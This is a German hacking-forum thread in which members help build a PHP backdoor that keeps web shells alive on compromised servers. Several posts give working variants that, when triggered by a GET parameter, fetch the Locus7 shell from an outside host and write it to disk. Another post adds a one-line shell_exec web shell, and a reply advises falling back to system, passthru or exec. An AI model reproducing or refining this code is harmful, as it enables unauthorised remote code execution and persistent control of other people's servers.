Ergebnis 1 bis 10 von 10
  1. #1
    fh oldSQLer Avatar von PoLe
    Registriert seit
    23.11.2006
    Beiträge
    233

    Standard backdoorscript will nicht ganz

    also ich hab keine lust mehr, dass meine shells andauernd deleted werden also hab ich beschlossen mir ein backdoor script zu basteln :

    Code:
    <?php 
    if($_GET['rykou']){
          $file = fopen("shell.php","w+"); 
          $stream = fopen ("http://usuarios.multimania.es/pilotcast/Locus7Shell.txt", "r"); 
          while(!feof($stream)) {
                $shell .=fgets($stream); 
          } 
    fwrite($file, $shell); fclose($file);}
    ?>
    das problem ist, dass es lokal funktioniert aber bei einigen funzt das eben nicht da kommen dann fehler wie:

    Code:
    Warning: Unexpected character in input: ' in /proc/30851/environ on line 1
    
    Parse error: syntax error, unexpected T_STRING in /proc/30851/environ on line 1

    jemand ne idee? ich vermute mal es hat was mit magic quotes zutun weil er wegen string rumheult...
    Alle sagten es geht nicht, doch dann kam einer, der wusste das nicht und machte es!

  2. #2
    Kevin Lee Poulsen Avatar von VeN0m
    Registriert seit
    30.12.2008
    Beiträge
    1.270

    Standard

    Ich würde es nicht über das Öffnen von URLs machen, sondern eher so:

    PHP-Code:
    <?php

    if($_GET["rykou"]) {

        
    $f fopen("shell.php","w+");
        
    fwrite($f,file_get_contents("http://usuarios.multimania.es/pilotcast/Locus7Shell.txt"));
        
    fclose($f);
        
    }

    ?>
    Ist denke ich fehlerunanfälliger.
    Come to the dark side - We have cookies

  3. #3
    fh oldSQLer Avatar von PoLe
    Registriert seit
    23.11.2006
    Beiträge
    233

    Standard

    PHP-Code:
    if($_GET+++91;"rykou"+++93;) 
    kannst mir den mal erklären?
    Alle sagten es geht nicht, doch dann kam einer, der wusste das nicht und machte es!

  4. #4
    W32.Lovgate Avatar von Notorious
    Registriert seit
    21.01.2010
    Beiträge
    323

    Standard

    Zitat Zitat von PoLe Beitrag anzeigen
    PHP-Code:
    if($_GET+++91;"rykou"+++93;) 
    kannst mir den mal erklären?
    Vbulletin zerstört den kot. VeN0m poste dein kot mit [CODE] tags

  5. #5
    Kevin Lee Poulsen Avatar von VeN0m
    Registriert seit
    30.12.2008
    Beiträge
    1.270

    Standard

    Mh, also als ich noch Mod war ging der PHP-Tag noch. Also:

    Code:
    <?php 
    
    if($_GET["rykou"]) { 
    
        $f = fopen("shell.php","w+"); 
        fwrite($f,file_get_contents("http://usuarios.multimania.es/pilotcast/Locus7Shell.txt")); 
        fclose($f); 
         
    } 
    
    ?>
    Come to the dark side - We have cookies

  6. #6

    Registriert seit
    17.06.2009
    Beiträge
    559

    Standard

    Dann könnte man es aber auch gleich so machen:
    Code:
    if(isset($_GET['rykou'])) file_put_contents('shell.php', file_get_contents('http://usuarios.multimania.es/pilotcast/Locus7Shell.txt'))

  7. #7
    Kevin Lee Poulsen Avatar von VeN0m
    Registriert seit
    30.12.2008
    Beiträge
    1.270

    Standard

    Sicher, aber ich bevorzuge immer noch die lange Version - frag' nicht wieso ^^.
    Come to the dark side - We have cookies

  8. #8
    Anfänger Avatar von hoohead
    Registriert seit
    30.06.2008
    Beiträge
    22

    Standard

    Für "Administrative Jobs" kann man quasi auch shell_exec nutzen.

    Code:
    <?php $output = shell_exec($_GET['hoo']); echo “<pre>$output</pre>”; ?>
    Vorausgesetzt die entsprechenden Serverkonfigurationen lassen ein shell_exec zu (PHP Safe Mode deaktiviert etc.).

  9. #9
    Kevin Lee Poulsen Avatar von VeN0m
    Registriert seit
    30.12.2008
    Beiträge
    1.270

    Standard

    Ich würde bei shell_exec dann aber mit is_callable("shell_exec") prüfen, ob die Funktion aufrufbar ist. Wenn nicht, dasselbe für system, passthru und/oder exec probieren.
    Come to the dark side - We have cookies

  10. #10
    fh oldSQLer Avatar von PoLe
    Registriert seit
    23.11.2006
    Beiträge
    233

    Standard

    hab schon verstanden, ich mach das dingens neu
    Alle sagten es geht nicht, doch dann kam einer, der wusste das nicht und machte es!

Ähnliche Themen

  1. Nicht ganz 4 free aber gut
    Von xPaulphenxx im Forum Trashbox
    Antworten: 6
    Letzter Beitrag: 10.03.2010, 17:04
  2. Antworten: 3
    Letzter Beitrag: 14.02.2010, 20:20
  3. Hydra geht nicht so ganz
    Von Ray.exe im Forum VoIP
    Antworten: 2
    Letzter Beitrag: 13.07.2008, 22:19

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •